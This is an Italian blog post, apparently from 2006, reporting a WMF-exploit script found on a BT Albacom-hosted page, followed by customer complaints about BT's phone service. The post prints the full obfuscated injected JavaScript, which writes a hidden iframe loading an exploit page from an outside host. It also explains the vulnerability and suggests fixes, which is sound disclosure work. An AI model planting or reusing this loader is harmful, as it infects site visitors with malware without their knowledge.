BT Albacom #2: Virus WMF.
(Ancora nessun voto)
Loading ...Dal sito ufficiale si legge: "BT Albacom è il principale fornitore in Italia di servizi e soluzioni di comunicazione interamente dedicato alle imprese e alla pubblica amministrazione, sia in termini di gamma di attività, sia di volumi d'affari".
Peccato che in uno dei loro servizi offerti sia presente un virus… Lo so! Ora mi direte che sono paranoico e drastico… che tutto può accadere… pare strano che in uno spazio web, offerto da BT Albacom, ove non è stato ancora "uploadato" (termine tecnico per i tecnici) il sito del cliente (ovviamente non per colpa del cliente, ma della solita burocratica inseminazione cervellotica di - e te dai - BT Albacom), proprio nella home page con il logo dell'azienda in questione, si nascondi, subdolamente, il virus test.wmf che sfrutta una delle innumerevoli falle di internet explorer (volutamente cancellato). Certo, c'è anche da considerare che esistono dei tools in grado di infettare automaticamente spazi web dove il sito è in costruzione… quindi tutto è possibile…sono solo io, nato nel più infimo dubitare, che mal mi adeguo a queste "peripezie".
Le immagini che riporto in questo articolo fanno da prova inconfutabile. Ma chi o che cosa ha fatto ciò? Forse un atto vendicativo di BT Albacom perché il cliente insoddisfatto cerca di pretendere la rescissione del contratto? Oppure i soliti malintenzionati lamer che circondano internet con i loro giochetti? Ovvero l'insicurezza dei server dell'azienda? O che cosa altro? No so che pensare! Davvero! Certo è che il sito in questione dove è possibile prelevare e (auto)infettarsi non è affatto un sito popolare.
Dalle foto in questione si può notare che il file test.wmf viene prelevato dal sito http://searchingwww.net. Andando - mi raccomando per fare queste operazioni usate il sistema operativo Linux - su tale sito ci troviamo una pagina bianca con qualche link… ogni link porta di rimando a dei siti alquanto discutibili (alcuni anche dal contenuto pornografico). Sta di fatto che qualcosa o qualcuno ha inserito nella home page del sito, ospitato da BT Albacom, questo file in modo da utilizzare la fantomatica falla di explorer.
Quali sono i danni?
Il codice nocivo sfrutta una vulnerabilità nel motore di rendering grafico WMF di Windows per scaricare e installare sul computer attaccato malware e trojans. WMF, o Windows Metafile, è un formato grafico vettoriale usato nel sistema operativo di Microsoft. La libreria SHIMGVW.DLL, che viene caricata per visualizzare le immagini, contiene un bug che consente attacchi di remote code execution tramite l'uso di una immagine malformata WMF e permette ad eventuali attackers di compromettere l'intero sistema infettato.
Dall'analisi del file index.html presente nella root directory del sito, nel codice sorgente, è presente uno script in javascript (al rogo!!), il quale ha il compito di caricare il dannato test.wmf.
Per la precisione lo script è il seguente:
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46, 119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,115, 114,99,61,34,104,116,116,112,58,47,47,115,101,97,114,99,104, 105,110,103,119,119,119,46,110,101,116,47,111,114,46,104,116, 109,108,34,32,104,101,105,103,104,116,61,48,32,119,105,100,116, 104,61,48,32,98,111,114,100,101,114,61,48,32,102,114,97,109,101, 98,111,114,100,101,114,61,48,62,60,47,105,102,114,97,109,101, 62,39,41))
Soluzione temporanea:
- Non aprire e eseguire la preview di files ".wmf" provenienti da fonti non sicure.
- Non utilizzare Internet Explorer ma, bensì, browser alternativi e più sicuri come Mozilla e Firefox e non salvare il files test.wmf sul vostro pc.
- Settare il livello di protezione ad "Alta" in Microsoft Internet Explorer.
Soluzione definitiva:
- Applicare l'apposita patch rilasciata dal team Microsoft.
- Rimpiazzare Windows XP con sistemi operativi più stabili e sicuri: Debian, Gentoo, Solaris ecc…
AGGIORNAMENTO DEL 05/01/2006: BT Albacom, dopo le segnalazioni, ha rimosso lo script in javascript, del sito in questione, che infettava i pc con il virus WMF.
 |
 |
| [Sotto Windows XP con Explorer] | [Sotto Windows XP con Firefox] |
 |
|
| [Con Linux risaliamo al sito web che contiente il test.wfm] | |
Se è per questo quelli di albacom sono anche venditori di fumo. In ufficio ci hanno venduto un contratto VOIP e da ben 11 giorni siamo isolati, senza possibilità di inviare fax, email o fare semplici telefonate. Ovviamente nemmeno i numeri di emergenza funzionano.
11 giorni di disservizio e per fortuna che abbiamo provato lo scotto direttamente sulla nostra pelle. MAI PIU’ BT-ALBACOM !! Piuttosto Telecom Italia per tutta la vitaaa !!
Commento di legales — 7 Dicembre 2006 @ 14:05
[Rispondi Al Commento]Ciao,
il discorso del disservizio di 11 giorni è che Telecom spesso rifiuta senza motivo alcuno le linee in modo che te alla fine tendi ad odiare la scelta di passare ad un altro gestore, in questo l’Albacom, oggi BT italia.
un dipendente BT.
Commento di Frank — 22 Febbraio 2007 @ 21:52
[Rispondi Al Commento]BT ITALIA E’ IL PEGGIOR GESTORE DI TELEFONIA MOBILE.
NON STIPULATE CONTRATTI CON LORO, SONO DEI VERI TRUFFALDINI.
IL VENDITORE CI AVEVA PROPOSTO UN TIPO DI CONTRATTO E FATTO SOTTOSCRIVERE, MA CI SIAMO RITROVATI CON TUTT’ALTRO CONTRATTO E TARIFFAZIONI DIVERSE. UNICO NOSTRO ERRORE E’ STATO QUELLO DI NON FARCI RILASCIARE SL MOMENTO DELLA SOTTOSCRIZIONE UNA COPIA DEL CONTRATTO, CHE CI E’ POI PERVENUTO VIA E-MAIL SOLO AD ATTIVAZIONE AVVENUTA. MA UDITE UDITE, NELLA PARTE RIGUARDANTE LE TARIFFE IL CONTRATTO PRESENTAVA AGBRASIONI E CANCELLATURE.
MA IL PEGGIO DOVEVA ANCORA VENIRE NEL MESE DI AGOSTO PERIODO DI NOSTRO MAGGIOR LAVORO (SIAMO UN’AGENZIA DI VIAGGI) CI HANNO LASCIATI ISOLATI PER BEN 15 GIORNI.
NATURALMENTE GLI FAREMO CAUSA, MA INTANTO CONSIGLIO A TUTTI DI EVITARLI.
Commento di raffaele — 26 Agosto 2007 @ 19:06
[Rispondi Al Commento]EVITATE BT ALBACOM
LE LORO LINEE NON FUNZIONANO MAI
CI LASCIANO PER GIORNI INTERI ISOLATI
ATTENZIONE A QUESTA SPECIE DI GESTORE TELEFONICO.
PROPAGATE QUESTO MESSAGGIO AFFINCHE’ ALTRI NON INCORRANO NEI LORO DISSERVIZI.
Commento di Raf — 31 Agosto 2007 @ 12:36
[Rispondi Al Commento]Abbiamo sottoscritto un contratto con BT ALBACOM con
un loro Agente ,un galantuomo ,EMANUELE B., che ci ha indicato delle tariffe la meta’ di quelle poi appicate in fattura;
Abbiamo fatto reclamo il 18 MAGGIO via FAX ,oggi 2 ottobre
ancora non rispondono nonostante continui solleciti al call center …….VERGOGNA
Commento di luca — 2 Ottobre 2007 @ 15:27
[Rispondi Al Commento]tempo fa credo giugno venne da me un agente bt telecom.mi illustro tutta l’offerta della loro azienda, parlava di un contratto di euro 75.00 al mese conprensivo di installazione internet 24 su 24 e chiamate locali ed extraurbane e 4h di chiamate verso cellulari conpresa nell’offerta.allibito dall’offerta ho aderito per due sedi.visto il ritardo nell’installazione per una sede ho rifiutato l’offerta lasciando l’offerta attiva per la seconda sede. nella sede dove e attiva l’offerta il telefono a dovuto subire tre interventi di assisenza. oggi o ricevuto una loro fattura di udite bene euro 359.00 per i loro servizi. ho chiamato al servizio clienti e mi dicono che l’inporto e giusto e che devo pagare, ho chiesto la disdetta e mi dicono che il contratto scade a giugno e fino a tale data sono tenuto a pagare loro una penale di euro 115.00. sono deluso e amareggiato e credetemi mi stanno rovinando la vita. se qualcuno di voi puo aitarmi resto in attesa. un saluto e viva la telecom
Commento di alessandro — 5 Novembre 2007 @ 14:24
[Rispondi Al Commento]Ciao,ho letto con stupore quello che ti è successo,sono un agente di BT il piano che ti è stato fatto è truffaldino,perchè il piano da 75 euro è un piano da linea analogica,che comprende chiamate voci verso fissi,locali e nazionali e 24h su 24 l’adsl a 2 mega con un totale di 75 euro/mese e un contributo di attivazione di 100 euro una tantum..io parlo di adesso del 2008 se vuoi ulteriori chiarimenti scrivimi francesco146@excite.it ciao
Commento di Francesco — 14 Febbraio 2008 @ 18:53
[Rispondi Al Commento]Ciao,ho letto con stupore quello che ti è successo,sono un agente di BT il piano che ti è stato fatto è truffaldino,perchè il piano da 75 euro è un piano da linea analogica,che comprende chiamate voci verso fissi,locali e nazionali e 24h su 24 l’adsl a 2 mega con un totale di 75 euro/mese e un contributo di attivazione di 100 euro una tantum..io parlo di adesso del 2008 se vuoi ulteriori chiarimenti scrivimi francesco146@excite.it ciao a presto
Commento di Francesco — 14 Febbraio 2008 @ 18:54
[Rispondi Al Commento]Anche noi abbiamo sottoscritto un contratto BT e sono 10 giorni che siamo senza linea telefonica.Essendo uno studio medico specialistico immaginate il danno.
PER RAFFAELE anche noi faremo causa a BT mi picerebbe confrontarmi con VOI per eventuali informazioni o “class action” puoi contattarmi a info@studiogyn.net
Commento di dott. marsico — 20 Aprile 2008 @ 11:20
[Rispondi Al Commento]